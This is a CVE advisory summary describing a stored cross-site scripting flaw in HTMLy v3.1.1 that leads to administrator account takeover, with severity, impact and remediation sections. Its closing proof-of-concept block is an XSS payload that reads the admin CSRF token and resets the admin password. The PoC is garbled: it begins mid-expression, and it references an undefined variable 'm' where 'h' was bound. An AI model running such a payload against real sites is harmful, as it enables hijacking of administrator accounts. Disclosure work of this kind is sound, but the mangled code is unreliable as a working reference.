# CVE-2026-38949 Summary ## Vulnerability Overview - **Vulnerability Name**: Stored Cross-Site Scripting (Stored XSS) vulnerability in HTMLy v3.1.1 leading to administrator account takeover. - **Vulnerability Type**: Stored Cross-Site Scripting (Stored XSS) - **Vulnerability Description**: In HTMLy v3.1.1, malicious JavaScript code is injected via the content field of the image publishing feature. Due to inadequate input validation, the malicious code is stored and executed when an administrator views the malicious post. The attacker can obtain the CSRF token from the administrator password change page and execute authenticated requests to modify administrator credentials (e.g., password). - **Severity**: 8.9 High (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L) - **CVE ID**: CVE-2026-38949 - **Affected Versions**: HTMLy v3.1.1 - **CWE ID**: CWE-79, CWE-352 ## Impact Scope - **Affected Product**: HTMLy v3.1.1 - **Impact Description**: An attacker can execute JavaScript code within the administrator's authenticated browser session, bypassing CSRF protection and dynamically retrieving valid tokens. This leads to administrator password modification, complete administrator account takeover, persistent unauthorized access, and full control over the application. ## Remediation - **Remediation Recommendations**: - Perform strict validation and filtering of input to prevent malicious code injection. - Implement effective CSRF protection mechanisms to ensure the legitimacy of requests. - Regularly update software versions to patch known vulnerabilities. ## POC Code ```html r.text()) .then(h=>{ let t=m.match(/name=\"csrf_token\" value=\"([^\"]+)\"/); fetch('/htmly/edit/password',{ method:'POST', credentials:'include', headers:{'Content-Type':'application/x-www-form-urlencoded'}, body:'csrf_token='+t[1]+'&username=admin&password=attacker' }); }); "> ``` ## References - [GitHub Repository](https://github.com/danpros/htmly/) - [HTMLy Official Website](https://www.htmly.com/)